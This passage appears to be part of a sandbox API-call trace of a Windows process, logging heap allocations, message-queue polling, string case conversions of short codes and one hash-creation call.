Flags=0x0, Size=0x8) returned 0x24b2de8 [0187.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0187.910] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0187.910] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.910] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0187.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0187.910] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.910] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.911] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.911] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0187.911] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0187.911] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0187.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0187.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.911] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0187.911] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.911] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0187.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0187.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.911] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.911] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0187.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0187.912] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0187.912] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0187.912] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0187.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0187.912] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0187.912] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.913] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0187.913] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0187.913] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0187.913] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0187.913] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0187.913] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0187.913] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0187.913] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.913] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.914] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0187.914] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.914] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0187.914] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0187.914] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0187.914] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0187.914] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0187.915] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0187.920] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0187.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0187.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0187.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0187.920] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.920] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.920] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0187.921] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0187.921] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0187.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0187.921] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0187.921] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.921] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0187.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0187.921] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0187.921] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0187.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.921] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.921] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0187.922] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0187.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0187.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0187.922] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.922] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0187.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0187.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.922] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.922] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.922] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.923] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0187.923] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0187.923] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0187.923] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.923] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0187.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0187.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0187.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0187.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0187.924] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0187.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0187.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0187.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.988] CryptCreateHash (in: hProv=0xaad240, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0187.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0187.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0187.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0187.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0187.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0187.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0187.989] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0187.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0187.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0187.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0187.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0187.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0187.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.990] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.990] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.991] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0187.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0187.992] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0187.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0187.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0187.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0187.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0187.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0187.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0187.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0187.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0187.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0187.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 